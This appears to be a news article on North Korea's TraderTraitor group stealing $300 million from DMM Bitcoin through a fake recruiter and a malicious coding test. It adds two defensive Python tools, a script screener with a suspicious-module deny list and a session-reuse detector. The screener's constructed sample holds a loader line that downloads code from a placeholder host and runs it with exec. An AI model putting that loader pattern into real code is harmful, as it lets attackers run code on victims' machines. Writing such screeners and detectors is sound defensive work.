- North Korean cyber actors have been identified as the perpetrators of the $300 million hack on the Japanese exchange DMM Bitcoin
- The FBI, Department of Defense Cyber Crime Center (DC3), and Japan’s National Police Agency (NPA) have identified the perpetrators as the state-backed TraderTraitor group
- The May 2024 theft was executed through a sophisticated phishing attack involving malicious Python scripts
North Korean cyber actors have been identified as the perpetrators of a sophisticated phishing attack that resulted in the theft of $300 million from DMM Bitcoin, a Japan-based cryptocurrency company. The FBI, Department of Defense Cyber Crime Center (DC3), and Japan’s National Police Agency (NPA) have jointly identified and exposed the state-backed TraderTraitor group as responsible. The attack combined a fake recruitment lure with a malicious Python script to compromise an employee of a third-party wallet software vendor, giving the attackers a foothold from which to tamper with DMM’s transactions.
Hacked Through Recruitment Process
In late March 2024, a North Korean cyber actor posing as a recruiter on LinkedIn contacted an employee at Ginco, a Japan-based enterprise cryptocurrency wallet software company. The attacker sent the employee a URL pointing to a malicious Python script hosted on GitHub and disguised as a pre-employment coding test. The employee, who had access to Ginco’s wallet management system, inadvertently executed the script, which compromised the employee’s system and credentials.
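The lure in this case was a "coding test" that the target was expected to run locally. As an added example (not code from the page, the investigation, or any of the organisations named), the screener below uses Python's own `ast` module to flag the patterns a loader disguised as a test typically carries: imports of network or process-spawning modules, `exec`/`eval` of decoded data, and embedded URLs or long opaque string literals. The deny list, the thresholds, and both sample scripts are assumptions constructed for illustration, not indicators published for this incident.

```python
import ast
import re

# Modules a take-home coding exercise has no business importing.
# Assumption: a reviewer-chosen deny list, not an official indicator list.
SUSPICIOUS_MODULES = {
    "subprocess", "socket", "ctypes", "urllib", "urllib.request",
    "requests", "http.client", "marshal", "pickle", "zlib",
}
DYNAMIC_EXEC = {"exec", "eval", "compile", "__import__"}
SUSPICIOUS_CALLS = {"base64.b64decode", "os.system", "os.popen"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
LONG_LITERAL = 120  # chars; a single unbroken literal this long is usually a payload


def _call_name(node: ast.Call) -> str:
    """Return a dotted name such as 'base64.b64decode' for a call, or '' if the
    callee is not a plain name or attribute chain (e.g. a call on a call)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def screen_script(source: str) -> list[str]:
    """Statically screen a Python script before anyone runs it.
    Returns human-readable findings; an empty list means nothing was flagged."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in SUSPICIOUS_MODULES:
                    findings.append(f"line {node.lineno}: imports {alias.name}")
        elif isinstance(node, ast.ImportFrom):
            if node.module in SUSPICIOUS_MODULES:
                findings.append(f"line {node.lineno}: imports from {node.module}")
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in DYNAMIC_EXEC:
                findings.append(f"line {node.lineno}: dynamic code execution via {name}()")
            elif name in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}()")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if URL_RE.search(node.value):
                findings.append(f"line {node.lineno}: embedded URL {node.value!r}")
            elif len(node.value) >= LONG_LITERAL and " " not in node.value:
                findings.append(f"line {node.lineno}: long opaque string literal "
                                f"({len(node.value)} chars)")
    return findings


# Constructed sample: what a genuine exercise looks like.
BENIGN_TEST = '''
def fizzbuzz(n):
    out = []
    for i in range(1, n + 1):
        if i % 15 == 0:
            out.append("FizzBuzz")
        elif i % 3 == 0:
            out.append("Fizz")
        elif i % 5 == 0:
            out.append("Buzz")
        else:
            out.append(str(i))
    return out
'''

# Constructed sample: the same exercise with a fetch-decode-exec loader appended.
# The URL is a reserved example domain, not a real indicator.
SUSPICIOUS_TEST = '''
import base64
import urllib.request

def fizzbuzz(n):
    return [str(i) for i in range(1, n + 1)]

_u = "https://example.invalid/stage2.txt"
exec(base64.b64decode(urllib.request.urlopen(_u).read()))
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_TEST), ("suspicious", SUSPICIOUS_TEST)):
        print(label, screen_script(src) or "clean")
```

Run the screener on the raw file before opening it in an IDE: some editors execute project configuration on open, so "just looking" can already be too late. A clean result is not a guarantee (a loader can be hidden in a dependency or a non-Python file in the same repository), which is why the stronger control is to run any unsolicited code only in a throwaway VM with no access to production credentials or browser profiles.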
By mid-May 2024, the TraderTraitor actors used the stolen session cookie information to impersonate the compromised employee, gaining unauthorized access to Ginco’s unencrypted communications system. In late May, they manipulated a legitimate transaction request made by a DMM employee, resulting in the unauthorized transfer of 4,502.9 BTC, valued at over $300 million at the time, to wallets controlled by the attackers.
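A stolen session cookie lets an attacker act as the user without ever presenting a password, so credential-centric controls (MFA, password resets) do not catch it. What does show up in the logs is the same session identifier being presented from a second client. As an added example (not code or data from the page or the companies involved), the detector below reads a constructed JSON-lines access log and flags any session id that appears from a new (source IP, user agent) fingerprint while the original session is still active. The log format, field names, and the 24-hour window are assumptions.

```python
import json
from datetime import datetime, timedelta

# Constructed JSON-lines access log (not real Ginco or DMM data). One employee's
# session id is later presented from a different address and browser, which is
# the footprint a replayed session cookie leaves.
SAMPLE_LOG = """\
{"ts": "2024-05-14T09:02:11Z", "user": "alice", "sid": "s-7f3a", "ip": "203.0.113.10", "ua": "Firefox/125"}
{"ts": "2024-05-14T09:15:40Z", "user": "alice", "sid": "s-7f3a", "ip": "203.0.113.10", "ua": "Firefox/125"}
{"ts": "2024-05-14T11:48:03Z", "user": "alice", "sid": "s-7f3a", "ip": "198.51.100.77", "ua": "Chrome/124"}
{"ts": "2024-05-14T11:49:30Z", "user": "alice", "sid": "s-7f3a", "ip": "198.51.100.77", "ua": "Chrome/124"}
{"ts": "2024-05-14T12:01:00Z", "user": "bob", "sid": "s-91c2", "ip": "203.0.113.11", "ua": "Firefox/125"}
"""


def parse_log(text: str) -> list[dict]:
    """Parse JSON lines, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _parse_ts(value: str) -> datetime:
    # Accept a trailing 'Z' on older Python versions of fromisoformat.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def detect_session_reuse(events: list[dict],
                         max_gap: timedelta = timedelta(hours=24)) -> list[dict]:
    """Return one alert per event in which a session id is presented from a
    fingerprint (ip, user agent) not seen on that session before, provided the
    session was used within max_gap beforehand (i.e. it is still live)."""
    seen: dict[str, dict] = {}  # sid -> {"fps": set of fingerprints, "last": datetime}
    alerts = []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        ts = _parse_ts(e["ts"])
        fp = (e["ip"], e["ua"])
        rec = seen.setdefault(e["sid"], {"fps": set(), "last": ts})
        if rec["fps"] and fp not in rec["fps"] and ts - rec["last"] <= max_gap:
            alerts.append({
                "ts": e["ts"],
                "user": e["user"],
                "sid": e["sid"],
                "known": sorted(rec["fps"]),
                "new": fp,
            })
        rec["fps"].add(fp)
        rec["last"] = ts
    return alerts


if __name__ == "__main__":
    for alert in detect_session_reuse(parse_log(SAMPLE_LOG)):
        print(json.dumps(alert))
```

The alert is the trigger; the response is to invalidate the session server-side and force re-authentication, since deleting the cookie on the victim's machine does nothing about the copy the attacker already holds. Binding sessions to the client fingerprint at issue time turns this detection into prevention, at the cost of breaking legitimate address changes such as a laptop moving between networks, so most deployments alert first and block only on a second signal.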
Crime Agencies Point the Finger
The FBI, DC3, and NPA have been actively working to expose and combat North Korea’s use of illicit activities, including cybercrime and cryptocurrency theft, to generate revenue for the regime. In a joint statement, they emphasized their commitment to pursuing such cyber threats:
The FBI, National Police Agency of Japan, and other U.S. government and international partners will continue to expose and combat North Korea’s use of illicit activities—including cybercrime and cryptocurrency theft—to generate revenue for the regime.
This incident underscores the persistent threat posed by North Korean cyber actors to the global financial system, particularly the cryptocurrency sector. The TraderTraitor group, also known as Jade Sleet, UNC4899, and Slow Pisces, is notorious for targeted social engineering attacks aimed at multiple employees within the same organization. Authorities continue to investigate and implement measures to prevent such incidents, urging companies to enhance their cybersecurity protocols and employee training to defend against sophisticated phishing attacks.